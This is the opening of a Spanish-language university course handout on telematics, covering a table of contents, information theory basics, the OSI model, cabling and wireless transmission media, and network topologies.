You are on page 1of 99

CATEDRA Profesor

Telemática Ing. Alexis Wol


_______________________________________________________________________________

1. TELEMATICA. .......................................................................................................................... 5
2. TELEPROCESOS. ...................................................................................................................... 6
2.1. Introducción ......................................................................................................................... 6
Teoría de la Información ......................................................................................................... 6
Sistema de Comunicación ....................................................................................................... 6
Características de la Información ............................................................................................ 7
Conceptos ................................................................................................................................ 7
Definición de Teleinformática ................................................................................................ 7
Modelo de Referencia OSI ...................................................................................................... 7
2.2. Medios Físicos y Topologías de Red ................................................................................... 9
Medios físicos de transmisión ................................................................................................. 9
Medios guiados ....................................................................................................................... 9
Medios no guiados ................................................................................................................ 11
Topologías de Red ................................................................................................................. 12
Tecnologías de Red y Topologías ......................................................................................... 13
2.3. Comunicaciones de Datos .................................................................................................. 14
Frecuencia ............................................................................................................................. 14
Datos analógicos y digitales .................................................................................................. 14
Perturbaciones en la transmisión ........................................................................................... 14
Codificación de Datos ........................................................................................................... 15
Datos digitales, Señales digitales .......................................................................................... 15
Interpretación de las señales .................................................................................................. 15
Datos digitales, Señales Analógicas ...................................................................................... 17
Datos analógicos, Señales digitales ....................................................................................... 17
Modulación por impulsos Codificados ................................................................................. 18
Datos Analógicos, Señales Analógicas ................................................................................. 18
Transmisión de datos ............................................................................................................. 18
Elementos de un sistema de transmisión ............................................................................... 19
Transmisión de Datos en Serie y Paralelo ............................................................................. 19
Transmisión asíncrona........................................................................................................... 19
Modos de explotación de un circuito de datos ...................................................................... 20
Comunicación Conmutada .................................................................................................... 20
2.4. Funciones a Nivel de Enlace .............................................................................................. 21
Inicialización de la Comunicación ........................................................................................ 21
Identificación ......................................................................................................................... 21
Transparencia ........................................................................................................................ 22
Segmentación y Delimitación de la Trama ........................................................................... 22
Sincronización ....................................................................................................................... 22
Coordinación de la Comunicación - Acceso al Medio .......................................................... 23
Control de Errores de Secuencia ........................................................................................... 25
Control de Flujo .................................................................................................................... 25
Recuperación de Fallas.......................................................................................................... 26
Terminación de la Comunicación ......................................................................................... 26
Gestión de Enlace .................................................................................................................. 26
Estrategias de Retransmisión ................................................................................................ 26
Los Mensajes de reconocimiento (o acuse)........................................................................... 26
3. TRANSMICION DE DATOS .................................................................................................. 28
3.1. Introducción ....................................................................................................................... 28
3.2. Transmisión De Datos En Internet ..................................................................................... 28
3.3. El Modelo OSI ................................................................................................................... 29

____________________________________________________________________________________________________________________
UNdeC Página 1
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

3.4. Arquitectura Cliente-Servidor. ........................................................................................... 29


3.5. El protocolo TCP/IP. .......................................................................................................... 29
3.6. TCP (Transmission Control Protocol)................................................................................ 30
3.7. UDP (User Datagram Protocol) ......................................................................................... 32
3.8. ICMP (Internet Control Message Protocol) ....................................................................... 32
3.9. IP (Internet Protocol) .......................................................................................................... 32
3.10. La dirección de Internet.................................................................................................... 33
3.11. Niveles Físico y de Enlace: .............................................................................................. 35
Ethernet ................................................................................................................................. 35
ARP (Address Resolution Protocol). .................................................................................... 36
3.12. Routing ............................................................................................................................. 36
3.13. Sistema de Nombres por Dominio ................................................................................... 38
3.14. Servicios de Internet: el nivel de Aplicación ................................................................... 39
3.15. Transferencia de Ficheros ................................................................................................ 39
3.16. Conexión Remota ............................................................................................................. 40
3.17. Correo Electrónico ........................................................................................................... 40
3.18. El acceso a Internet .......................................................................................................... 41
3.19. Otras Fuentes de Información .......................................................................................... 41
4. APLICACIONES DE RED ....................................................................................................... 43
4.1 HTTP ................................................................................................................................... 43
Transacciones HTTP ............................................................................................................. 43
Ejemplo de un diálogo HTTP................................................................................................ 44
Herramientas de Software libre ............................................................................................. 44
Primeros Servidores .............................................................................................................. 45
Glosario ................................................................................................................................. 45
4.2. FTP ..................................................................................................................................... 46
Un poco de historia ............................................................................................................... 46
El Modelo FTP ...................................................................................................................... 47
Servidor FTP ......................................................................................................................... 47
Cliente FTP ........................................................................................................................... 48
Acceso anónimo .................................................................................................................... 48
Acceso de usuario.................................................................................................................. 48
Acceso de invitado ................................................................................................................ 48
Modos de conexión del cliente FTP ...................................................................................... 48
Modo Activo ......................................................................................................................... 49
Modo Pasivo .......................................................................................................................... 49
Tipos de transferencia de archivos en FTP ........................................................................... 49
Guía de comandos FTP ......................................................................................................... 50
4.3. SMTP ................................................................................................................................. 51
Funcionamiento ..................................................................................................................... 52
Resumen simple del funcionamiento del protocolo SMTP ................................................... 52
Ejemplo de una comunicación SMTP ................................................................................... 53
Formato del mensaje ............................................................................................................. 53
Seguridad y spam .................................................................................................................. 53
4.4. POP..................................................................................................................................... 54
Resumen ................................................................................................................................ 55
Características ....................................................................................................................... 55
Órdenes.................................................................................................................................. 55
Ventajas ................................................................................................................................. 56
4.5. IMAP .................................................................................................................................. 56

____________________________________________________________________________________________________________________
UNdeC Página 2
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Introducción .......................................................................................................................... 56
Ventajas sobre POP3 ............................................................................................................. 56
4.5. SSH..................................................................................................................................... 57
Seguridad ............................................................................................................................... 57
Historia .................................................................................................................................. 58
Manejo de SSH en un sistema Debian 3.1 GNU/Linux ........................................................ 58
4.6. TELNET ............................................................................................................................. 59
Manejo básico de telnet ......................................................................................................... 59
Seguridad ............................................................................................................................... 60
4.7. SNMP ................................................................................................................................. 60
Componentes básicos de SNMP ........................................................................................... 60
Comandos básicos de SNMP ................................................................................................ 61
Base de información de administración SNMP (MIB) ......................................................... 61
Mensajes SNMP .................................................................................................................... 63
4.8. DNS .................................................................................................................................... 64
Componentes ......................................................................................................................... 65
Entendiendo las partes de un nombre de dominio................................................................. 65
Tipos de servidores DNS....................................................................................................... 65
Tipos de resolución de nombres de dominio ......................................................................... 65
Tipos de registros DNS ......................................................................................................... 66
5. WIRELESS. .............................................................................................................................. 67
5.1. Resumen. ............................................................................................................................ 67
5.2. Introducción ....................................................................................................................... 67
5.3. Opciones de Conectividad .................................................................................................. 67
Cableadas .............................................................................................................................. 67
Inalámbricas .......................................................................................................................... 69
5.4. La alternativa Wi-Fi ........................................................................................................... 73
5.5. Conclusiones ...................................................................................................................... 73
5.6. Referencias ......................................................................................................................... 74
6. SEGURIDAD INFORMATICA ............................................................................................... 75
6.1 Introducción ........................................................................................................................ 75
Términos relacionados con la seguridad informática ............................................................ 75
6.2. Objetivos ............................................................................................................................ 75
6.3. Análisis de Riesgos ............................................................................................................ 76
6.4. Puesta en marcha de una política de seguridad .................................................................. 76
6.5. Las amenazas...................................................................................................................... 76
6.6. Técnicas de aseguramiento del sistema .............................................................................. 77
Criptología ............................................................................................................................. 77
Criptografía ........................................................................................................................... 78
Véase también ....................................................................................................................... 79
Consideraciones de software ................................................................................................. 80
Consideraciones de una red ................................................................................................... 80
6.7. Algunas afirmaciones erróneas comunes acerca de la seguridad ....................................... 80
6.8. Organismos oficiales de seguridad informática ................................................................. 80
6.9. Véase también .................................................................................................................... 80
6.10. General ............................................................................................................................. 81
Terminología ......................................................................................................................... 81
Tecnología y el Malware ....................................................................................................... 82
6.11. Linux ................................................................................................................................ 82
Lo Básico en Seguridad......................................................................................................... 82

____________________________________________________________________________________________________________________
UNdeC Página 3
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Es Necesario Antivirus? ........................................................................................................ 83


Súper Usuario ........................................................................................................................ 83
Medidas de Seguridad ........................................................................................................... 83
6.12. Windows........................................................................................................................... 84
Introducción. ......................................................................................................................... 84
Como Saber si estoy infectado .............................................................................................. 84
Desinstalando Virus sin Antivirus......................................................................................... 85
Procedimiento........................................................................................................................ 86
Usuario .................................................................................................................................. 87
Ad-Ware y Spy-Ware ............................................................................................................ 87
Acciones comunes de los malware........................................................................................ 88
Malware ................................................................................................................................. 88
Métodos Antidetección ......................................................................................................... 89
Vulnerabilidades.................................................................................................................... 89
7. PROTOCOLOS DE TRANSMICION...................................................................................... 91
7.1. Resumen. ............................................................................................................................ 91
7.2. Introducción. ..................................................................................................................... 91
7.3. Que es Frame Relay ?......................................................................................................... 91
Características de Frame Relay. ............................................................................................ 91
7.4. Que es ATM ? .................................................................................................................... 92
ATM y sus Beneficios: .......................................................................................................... 93
ATM y algunas debilidades: ................................................................................................. 93
7.5. ATM y Frame Relay, Competencia o Coexistencia. .......................................................... 93
Interopertavidad de Red y Servicio ....................................................................................... 93
ATM FRAME UNI ............................................................................................................... 94
Enfoques de Interoperatividad .............................................................................................. 94
CONCLUSIONES ................................................................................................................ 94
7.6. ISDN................................................................................................................................... 95
Principios de la RDSI ............................................................................................................ 95
La interfaz del usuario ........................................................................................................... 95
Interfaces y Funciones ........................................................................................................... 96
Servicios ................................................................................................................................ 97
Adaptación de terminales ...................................................................................................... 97
Arquitectura de Protocolos .................................................................................................... 98
Conexiones RDSI .................................................................................................................. 98
Conector RJ-45 ...................................................................................................................... 98

____________________________________________________________________________________________________________________
UNdeC Página 4
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

1. TELEMATICA.
Internet, comercio electrónico, tele enseñanza, tele trabajo, multimedia, telefonía digital, transferencia de
datos a alta velocidad, redes de acceso fijas y móviles, protocolos de comunicación, demótica,
globalización de las comunicaciones, interconexión de redes de comunicaciones, seguridad de red, etc.
La palabra Telemática está formada por la unión de las telecomunicaciones y la informática. Esto se
puede ver en su doble vertiente:

1. Las telecomunicaciones al servicio de la informática, es decir, los medios de transmisión, las redes y
los servicios de comunicaciones, permitiendo y facilitando el diálogo y el uso compartido de recursos
entre ordenadores, lo que se hace patente en la realidad en las redes de área local de ordenadores,
tanto para aplicaciones ofimáticas como industriales, intranets, Internet, etc.

2. La informática al servicio de las comunicaciones, entendida como computadoras y programas que


desarrollan tareas de comunicaciones como, por ejemplo, centrales digitales de telefonía, de transmisión
de datos, redes digitales de servicios integrados (RDSI), Internet, conmutadores, routers, etc.

1.1. ¿Estudios de Telemática?


El Ingeniero/a Técnico/a de Telecomunicación, especialidad en Telemática ha de saber desarrollar las
tareas propias y comunes de la ingeniería: diseño, realización y dirección de proyectos de
telecomunicación, de informática y de telemática. En la fase formativa tendrás que adquirir las
capacidades mínimas de autoaprendizaje, búsqueda de información y expresión. También conocerás
técnicas de electrónica digital, procesado de señal, transmisión de datos por cable, programación y
arquitectura de computadores. Otro ámbito lo constituyen los conocimientos de diseño, especificación y
planificación de los sistemas telemáticos. Con más profundidad, serás capaz de caracterizar los sistemas
telemáticos y comparar las posibles soluciones técnicas que se ajustan a las necesidades del usuario y
los conocimientos para la gestión y mantenimiento de estos sistemas.

1.2. ¿Cuáles son las salidas profesionales de Telemática?


Algunos de los perfiles profesionales:
1. Trabajar como ingeniero/a en una empresa operadora de telecomunicaciones: trabajarás en el diseño,
gestión y mantenimiento de las redes de comunicación de la operadora. Y también en las tecnologías,
técnicas de conmutación y protocolos de las redes de área extendida y metropolitana actuales y
emergentes, tanto para redes de acceso fijas y móviles como de transporte. Podrás ocupar puestos de
trabajo correspondientes a cargos intermedios y de dirección en empresas y organismos.

2. Trabajar como ingeniero/a en una empresa del sector de la telemática: en una empresa que se
dedique al desarrollo de equipos, aplicaciones y/o servicios telemáticos para otras empresas o a
comercializarlos. En cualquier caso, trabajarás en el diseño de comunicaciones de la empresa y su
gestión; voz, datos y multimedia dentro de la empresa, redes de área local y interconexión de redes,
bases de datos, Web y portales de Internet.

3. Trabajo por cuenta propia: haciendo y dirigiendo proyectos telemáticos y asesorías a empresas y
organismos.

4. Sociedad de la información: Desarrollo y explotación de aplicaciones telemáticas, aplicaciones


multimedia sobre las redes emergentes dentro de la sociedad de la información. Aplicaciones del tipo
tele trabajo y trabajo cooperativo, tele enseñanza, comercio electrónico, etc.

5. Trabajar como ingeniero/a en la industria: podrás trabajar en el departamento de telemática de una


empresa que no sea del sector. Diseño, desarrollo y explotación de redes, servicios y aplicaciones de
comunicaciones en el entorno industrial, como fabricación, control de procesos, medio ambiente y control
de edificios.

____________________________________________________________________________________________________________________
UNdeC Página 5
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

2. TELEPROCESOS.
2.1. Introducción
Teoría de la Información
Busca poder transmitir información a máxima velocidad posible por un canal de comunicación con la
cantidad mínima de errores posibles.
La teoría de la comunicación fue formulada por Claudie Shannon (Ingeniero y Matemático) en 1940 y
aparece publicado por primera vez en 1948.

Sistema de Comunicación

Fuente de ruido
FUENTE  TRANSMISOR  CANAL  RECEPTOR  DESTINO

Figura 1. Sistema de Comunicación

Fuente: Componente de naturaleza humana, mecánica o eléctrica que determina el tipo de mensaje que
se transmitirá y su grado de complejidad.
Transmisor: Recurso técnico que transforma el mensaje originado por la fuente de información en
señales apropiadas.
Canal: Medio generalmente físico que transporta las señales en el espacio (cumple funciones de
mediación y transporte).
Receptor: Recurso técnico que transforma las señales recibidas.
Destino: Componente Terminal del proceso de comunicación, al cual está dirigido el mensaje.
Ruido: Expresión genérica utilizada para referirse a las distorsiones originadas en forma externa al
proceso de comunicación.

Los efectos del la información según Shannon son:


“Información es lo que reduce la incertidumbre”
“Es el conjunto de datos que permiten tomar una decisión”

Luego:
“Información es una expresión o (mensaje), enviada por un ente emisor que es aceptada como
integrante de una comprensión de un ente receptor“.
Entonces, para que sea posible la comunicación, tanto el emisor como el receptor deben poseer un
alfabeto común.

Una definición más cercana del fenómeno de la comunicación sería:


“Información es un cambio estructural producido en un organismo receptor a partir de un estimulo
(mensaje) originado en el entorno (emisor)”.

EMISOR  MENSAJE  RECEPTOR

Figura 2. Información como cambio estructural.

“La información es inversamente proporcional a la probabilidad de ocurrencia del mensaje”.

Desde otro punto de vista la información es un concepto primitivo por lo que en forma exacta no se
puede definir, sin embargo sabemos que se puede hacer con ella:
Almacenar
Procesar
Transmitir
Nótese que el hombre en su vida, Almacena la Información, Procesa la Información, y Comunica
la Información.

____________________________________________________________________________________________________________________
UNdeC Página 6
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Características de la Información
Inmaterial (no es materia ni energía)
Esta en todo lo creado
Independiente del tiempo y el espacio
Se manifiesta a través de señales
Se puede medir por medio de los cambios en las señales

Conceptos
Señal: Representación física del mensaje por medio de la variación de uno o varios de sus parámetros
del la magnitud física.
(Las señales también pueden ser: transmitidas, almacenadas y procesadas).
Semántica: Se preocupa del contenido o significado del la información.
Codificación: Adapta las señales o ciertos aspectos relacionados con la información al medio de
procesamiento, transmisión o almacenamiento.
Mensaje: Secuencia de símbolos o estados, que sirven para transmitir información (ejemplo: Lenguaje,
música, variables numéricas, diagramas, etc.)
Datos: Información presentada por medio de un símbolo o mediante funciones continuas, de acuerdo a
una convención dada.

¿Cómo se mide la información?


INF = ld 2 = 1 bit (binary digit)
1 bit constituye la cantidad mínima de información.

Definición de Teleinformática
Entendemos como teleinformática o telemática como el conjunto de elementos y técnicas que permiten
la transmisión automática de datos.
Al hablar de transmisión se asume que existe una distancia apreciable entre origen y destino de la
comunicación; Este es, el sentido del prefijo tele. Además, es automática puesto que no se requiere
intervención humana para llevar a cabo la comunicación. En cuanto a los datos, entendemos como
tales, a las entidades susceptibles de ser tratadas por un computador.
En un principio, los computadores eran caros y escasos. Los organismos que disponían de un
computador lo dedicaban a la ejecución de programas locales. Un usuario utilizaba los dispositivos de
entrada (tarjetas perforadas, teclado, unidades de disco, etc.) para cargar el programa y los datos en el
computador y, tras la ejecución, recogía los resultados mediante los dispositivos de salida (tarjetas
perforadas, impresora, Terminal, etc.). No obstante, pronto se hizo necesario compartir los datos y
recursos entre computadores, así como el acceso a datos remotos. A partir de esta necesidad fueron
surgiendo mecanismos cada vez más evolucionados, comenzando por las primeras conexiones punto a
punto entre computadores mediante líneas dedicadas. Los grandes fabricantes comenzaron a investigar
en este aspecto, dando como resultado la aparición de las redes locales, que permiten la interconexión
de varios computadores entre sí.

Modelo de Referencia OSI


El modelo de referencia OSI es la definición de un modelo de arquitectura, desarrollado por la
Organización de Estándares Internacionales (ISO, International Standar Organization). Este es
frecuentemente usado para describir la estructura y función de los protocolos de comunicaciones de
datos. Este modelo llamado Interconexión de Sistemas Abiertos (OSI, Open System Interconnect),
provee una referencias para todos los sistemas de comunicación.
Es modelo de referencia OSI posee 7 capas que definen las funciones de los protocolos de
comunicaciones de datos. Cada capa del modelo OSI presenta la ejecución de una función, cuando los
datos son transferidos entre aplicaciones cooperativas que están corriendo en la red. Observando la
figura 4 se distingue que claramente que los protocolos están en una pila de bloques uno sobre otro.

____________________________________________________________________________________________________________________
UNdeC Página 7
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

7 Capa de Aplicación
Esta compuesta por programas y/o
aplicaciones que se usan en las redes
6 Capa de Presentación
Estandariza la presentación de los
datos para las aplicaciones
5 Capa de Sesión
Maneja y controla las sesiones entre
aplicaciones
4 Capa de Transporte
Provee detección y corrección de
errores entre las extremos
3 Capa de Red
Administra conexiones de la red
para las capas superiores
2 Capa de Enlace
Provee entrega confiable de datos a
través del medio físico
1 Capa Físca
Define características físicas del
medio de red
Figura 4. Modelo de Referencia OSI

Una capa no define un simple protocolo, esta identifica y define funciones de comunicaciones de datos,
que pueden ser ejecutadas por cualquier número de protocolos. De este modo, cada capa puede
contener múltiples protocolos, cada uno, proveyendo un conjunto de servicios para la función de esta
capa. Por ejemplo un: protocolo de transferencia de archivos y un protocolo de correo electrónico
provee servicios de usuario, y ambos son parte de la capa de aplicación.
Todo protocolo comunica puntos extremos. Un punto extremo es una implementación del mismo
protocolo, es decir, el protocolo de transferencia de archivos local es el extremo del protocolo de
transferencia de archivos remoto. El nivel de comunicación en los extremos debe ser estandarizada para
que los comunicación sea exitosa.
En la comunicación debe existir acuerdo sobre como pasar datos entre las capas sobre una simple
computadora, porque cada capa esta involucrada en el envío de datos desde una aplicación local a una
aplicación remota equivalente. En el punto remoto los datos son pasados sobre la pila para a recepción
de la aplicación. Las capas individuales no necesitan conocer como las capas que están sobre y debajo
de ellas funcionan, ellas sólo necesitan conocer como pasar datos hacia su sub-capa inferior y superior
respectivamente. Aislando las funciones de comunicaciones de datos en diferentes capas se minimiza el
impacto de los cambios tecnológicos sobre el conjunto total de los protocolos. Nuevas aplicaciones
pueden ser agregadas sin cambiar las red física y nuevas redes de hardware pueden ser instaladas sin
re-escribir el software de aplicación.

Definición de funcionalidades por cada capa:


Capa 1, Física: Se encarga de la transmisión de cadenas de bits no estructurados sobre el medio físico;
esta encargado de las características eléctricas, mecánicas, funcionales y de procedimiento para
acceder al medio físico que lleva la señal. Algunos ejemplos son el cable de par trenzado, el cable de
fibra óptica, el cable coaxial y los cables seriales.
Capa 2, Enlace de datos: Proporciona un servicio de transferencia de datos seguro a través del enlace
físico; envía bloques de datos (tramas) llevando a cabo la sincronización el control de errores y de flujo
necesarios. Controla el acceso a la red y asegura la transferencia confiable de tramas sobre la red. La
especificación de más conocida de enlace de datos es el Acceso Múltiple sensible al portador con

____________________________________________________________________________________________________________________
UNdeC Página 8
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

detección de colisión (CSMA/CD) de Ethernet.


Capa 3, Red: Proporciona independencia de los niveles superiores respecto a las técnicas de
direccionamiento (comunicación y transmisión) utilizados para conectar los sistemas, es responsable
del establecimiento, mantenimiento y cierre de conexiones. Administra el movimiento de los datos
entre diferentes redes. Los protocolos de esta capa son responsables de encontrar el dispositivo al que
están destinado los datos. Algunos ejemplos son IP, IPX y AppleTalk.
Capa 4, Transporte: Proporciona seguridad y transferencia transparente de datos entre los punto
finales, proporciona además procedimientos de recuperación de errores y control de flujo origen-destino.
Asegura que los datos alcanzan su destino intactos y en el orden correcto. El protocolo de Control de la
transmisión (TCP) y el protocolo de datagrama de usuario (UDP) operan en esta capa.
Capa 5, Sesión: Proporciona el control de la comunicación entre las aplicaciones; establece, gestiona y
cierra las conexiones (sesiones) entre aplicaciones cooperativas. Establece y Termina las conexiones y
pone en orden las sesiones de dos computadoras. Algunos ejemplos de la capa de sesión sin la llamada
a procedimiento remoto (RPC) y el protocolo ligero de acceso a directorio (LDAP).
Capa 6, Presentación: Proporciona a los procesos de aplicación independencia, respecto a las
diferencias en la presentación de los datos (sintaxis). Da Formato a los datos para presentarlos en
pantalla o imprimirlos. Algunos ejemplos de protocolos de la capa de presentación son el protocolo
ligero de presentación y NetBIOS.
Capa 7, Aplicación: Proporciona el acceso al entorno OSI para los usuarios y también proporciona
servicios de información. Algunos ejemplos de protocolos de aplicación son el protocolo simples de
transferencia de correos (SMTP) y el protocolo de transferencia de hipertexto (HTTP).

Las aplicaciones de la red de la capa 7 son la razón de la existencia de las 6 capas inferiores. Muchos
de estos protocolos se usaron por primera vez en los sistemas UNIX, dado que el sistema Unix se
desarrollo en paralelo con Internet.

7 Aplicación  Producto final  Aplicación 7


6 Presentación  Salida por pantalla  Presentación 6
 Iniciar, detener, reanudar 
5 Sesión Sesión 5
 Administración punto a punto 
4 Transporte  Direcciones, rutas  Transporte 4
3 Red  Acceso al medio  Red 3
Transmisión binaria 
2 Enlace Enlace 2
 Medio de red 
1 Física  Normalmente un cable  Física 1

Dispositivo de red A Dispositivo de red B

Figura 5. Todas las capas OSI ejecutan un protocolo para administrar las conexiones entre los
dispositivos.

2.2. Medios Físicos y Topologías de Red


Medios físicos de transmisión
Las comunicaciones siempre se realizan a través de un medio de transmisión. Existen dos tipos de
medios:
Medios guiados (Cables)
Medios no guiados (Aire, mar, vacío)
Por estos medios la comunicación se realiza a través de ondas electromagnéticas o a través de luz.

Medios guiados
Los medios físicos de transmisión en las redes son las carreteras por donde pasa la información, la

____________________________________________________________________________________________________________________
UNdeC Página 9
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

denominación más común dada es cableado. Las redes funcionan sobre dos tipos de medios de
transporte físicos:
El Cable de Cobre
El Cable de Fibra Óptica
Prácticamente todas las redes de área local que se instalan en el mundo de hoy son del alguna forma
cables de cobre. El cableado de fibra óptica se usa principalmente para redes troncales de alta
velocidad.

Fibra Óptica
La fibra óptica es un medio flexible y extremadamente fino, capaz de transmitir energía de naturaleza
óptica. Para su construcción o se usan distintos tipos de cristales y plásticos. La Fibra de vidrio o el
plástico, con un índice de refracción alto, que se emplea para transmitir luz.
La fibra óptica es un elemento discreto de transmisión óptica compuesta normalmente por un núcleo
y un revestimiento, ambos de fibra. Al ser un sistema de guía de luz normalmente cilíndrico, se
compone de un material di-eléctrico transparente con un determinado índice de refracción menor; o
de un cilindro cuyo índice de refracción va disminuyendo progresivamente según nos vayamos
alejando del eje del cilindro. La longitud de una fibra es normalmente mucho mayor que su diámetro.
La fibra debido a su refracción interna transmite luz a través de su eje longitudinal la luz entra por
uno de sus extremos y sale por el otro, con pérdidas que dependen otros de la longitud, absorción,
dispersión y otros factores.

Cable Coaxial
Consiste en un conductor cilíndrico externo que rodea a un cable conductor interno. El conductor
interno se mantiene a lo largo de un eje axial, mediante una serie de anillos aislantes de material
dieléctrico. Está compuesto, de fuera a dentro, de una funda plástica, habitualmente de color negro, tras
la cual se encuentra una malla entrelazada de hilos de cobre que cubren a una protección plástica con
un hilo de cobre central.
Se usa con Multiplexión por división de Tiempo para poder transportar más de 10.000 Canales de voz
simultáneamente.
La distancia máxima utilizada en este tipo de cable es de 150 metros y 15 nodos (normativa estándar) ó
300 metros. y 30 nodos (normativa extendida). Entendiendo por nodo un corte realizado ha dicho cable.

Características de Transmisión

El coaxial se usa tanto para señales analógicas como digitales. Es menos susceptible a las interferencias
como la diafonía. Sus principales limitaciones son la atenuación, el ruido térmico y el ruido
ínter modulación.

Aplicaciones

Distribución de Televisión (CATV, ―Community Antenna Television‖).


Telefonía de larga distancia
Conexión con periféricos
Redes de área local.

Cable de par trenzado


Consiste en dos pares de cobre embutidos en un aislante entrecruzado en forma espiral. El uso del
trenzado tiende a reducir las interferencias electromagnéticas (diafonía) entre los pares adyacentes
dentro de una misma envoltura. El Par trenzado es más usado en Telefonía y en Redes de Área Local.
El par trenzado que generalmente se usa en redes de computadores es un cable compuesto, de fuera a
dentro, de una funda de plástico, habitualmente de color gris, tras la cual se encuentran 8 hilos de
cobre cubiertos de una funda plástica y entrelazados en pares dando dos vueltas y media por pulgada.
La distancia máxima utilizada en este tipo de cable es de 105 metros entre la tarjeta de red y el
concentrador.

Características de Transmisión

____________________________________________________________________________________________________________________
UNdeC Página 10
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Los pares se pueden usar para transmitir tanto señales analógicas como señales digitales, en telefonía
se requieren repetidores cada 2 o 3 km.
Existen dos tipos de pares trenzados: El par trenzado no apantallado (UTP, ―Unshielded Twister Pair)
que es económico y fácil de instalar y El par trenzado apantallado (STP, ―Shielded Twister Pair‖), que
es más costoso y difícil de instalar.

El cable de par trenzado es de dos tipos fundamentalmente:

STP (Shielded Twisted-Pair; Par Trenzado apantallado). Un medio de cable de dos pares recubierto
por una pantalla aislante para disminuir las interferencias electromagnéticas de las señales.
UTP (Unshielded Twisted-Pair; Par Trenzado sin apantallar). Un medio de cableado de cuatro pares
no recubierto con una pantalla. UTP es lo que se usa en la mayoría de las redes.
Cuanto más apretados están los filamentos del cable de cobre, menos probable es que haya
interferencia o pérdidas de señal. El cable STP sólo tiene dos pares trenzados, pero lo compensa su
apantallamiento; UTP no tiene apantallamiento, pero lo compensa con un par extra de cables. Como
UTP es rápido, fiable y más barato se ha convertido en el tipo de cableado predominante usado
actualmente en interconexión de redes. El uso de la tecnología STP es más costosa y se restringe a
entornos más hostiles con un elevado nivel de interferencias electromagnéticas.

Especificaciones de Cableado

La siguiente tabla explica las 6 categorías de par trenzado sin apantallar especificados por una
organización de estándares internacional llamada TIA/EIA (Telecomunication Industry
Associtioon/Electronics Industry Association). Estas especificaciones de cableado son importantes ya
que la tasa de transferencia (velocidad) a que los datos pueden transmitir de forma confiable queda
determinada por la combinación de los siguientes factores:
Lo apretado que esté el cable trenzado de cobre.
La calidad del cobre del cable.
El tipo de aislamiento que se usan para recubrir el cable.
El diseño y la calidad de los conectores.
En la siguiente tabla, la categoría 5 representan la mejor elección en lo que respecta a redes de par
trenzado actuales. Nótese que los números de categorías más altas indican tasas de transferencias más
altas.

Categoría Descripción del Cable Aplicación del Cable


Cat 1 Cable telefónico tradicional No se puede usar para redes.
Cat 2 Par trenzado de cuatro hilos. 4 Mbps. No es recomendable para redes
Cat 3 Par trenzado de cuatro hilos con tres giros por pie, alcanza frecuencias de 16 Mhz. 10Mbps
en Ethernet y 4 Mbps Token Ring, también se usa actualmente en telefonía.
Cat 4 Par trenzado de cuatro hilos, alcanza frecuencias de 20 Mhz. Redes Token Ring de 16
Mbps.
Cat 5 Par trenzado de cuatro hilos con ocho giros por pie, alcanza frecuencias de 100 Mhz. Se
principalmente en redes Fast Ethernet de 100 Mbps. Cat 5 mejorada Par trenzado de cuatro
hilos con ocho giro por pie pero fabricado con materiales de mejor calidad. Alcanza
frecuencia de 200 Mhz. Alcanza tasas de transferencia de hasta el doble de la capacidad de
transmisión de la categoría 5.
Cat 6 Par trenzado de cuatro hilos con cada par envuelto en un apantallamiento de aluminio; todo
cubierto con un polímero. Alcanza tasa de transferencias de hasta 1 Gbps.

Medios no guiados
Microondas terrestres
Las microondas terrestres son un medio no guiado para la transmisión de datos a través del aire (sin
alambres). Para cual es necesario poseer equipamiento de transmisión, una antena parabólica y el
enlace debe ser de vista, o sea, no debe existir ningún obstáculo entre las antenas. Su principal uso es
las telecomunicaciones de larga distancia para comunicaciones de televisión y voz.
El uso de microondas requiere de un menor número de repetidores y amplificadores que el cable
coaxial, pero es necesario que las antenas estén alineadas.

____________________________________________________________________________________________________________________
UNdeC Página 11
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Microondas por satélite


Los satélites son estaciones que esencialmente retransmiten microondas, se usan como enlace en dos o
más receptores terrestres llamadas estaciones base.
Las aplicaciones son. Difusión de televisión y transmisión telefónica de larga distancia y redes
privadas.
Ondas de radio
Difieren de las microondas en que las ondas de radio son omnidireccionales, no necesitan parabólicas,
ni deben estar alineadas, ejemplo telefonía rural, Radiodifusión, televisión de señal libre.
Infrarrojos
Las comunicaciones mediante infrarrojos se realizan mediante transmisores-receptores (―tranceivers‖)
que modulan la luz infrarroja. Los tranceivers deben estar alineados directamente o puede comunicarse
mediante reflexión en una superficie coloreada.

Topologías de Red
El diseño físico de la red se conoce como su topología.

Topología Bus
Una topología Bus utiliza un solo medio de transmisión llamado bus (cable). Todos los computadores
en una red similar se conectan directamente al bus. Casi siempre un cable coaxial sirve como medio de
transmisión en una topología de este tipo. En la figura 7 se muestra una red de computadores utilizando
una topología en bus.

Figura 7. Topología en bus.

En una topología en bus la información puede viajar en ambas direcciones. Esta topología requiere de
conexiones terminales (o terminadores) especiales en ambos extremos del bus. Una interrupción física
en cualquier parte del bus provoca la falla de toda la red.

Topología Anillo
La topología en Anillo no posee conexiones de terminales, es decir, forma un anillo continuo (no
necesariamente circular) a través de la cual puede viajar la información. Debido a su forma circular, en
una topología anillo los datos viajan sólo en una dirección alrededor de este. La figura 8 describe una
red de computadores usando esta topología.

____________________________________________________________________________________________________________________
UNdeC Página 12
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Figura 8. Esquemas de conexión de computadores usando la topología bus.

Como la topología anillo necesita una ruta sin interrupciones, entre los computadores, un corte en
cualquier punto provocaría que las comunicaciones en la red fueran interrumpidas.

Topología Estrella
En la topología estrella todos los computadores de la red se conectan a un concentrador central (hub o
switch). En este caso no existe comunicación directa entre computadores, toda la comunicación es
centralizada por el concentrador. La figura 9 muestra una red usando esta topología.

Figura 9. Topología de red tipo estrella.

Esta topología es la más usada. Su mayor ventaja es que si ocurriera un corte en la comunicación entre
el concentrador y un computador, esta falla solo afectaría al computador y no a toda la red.

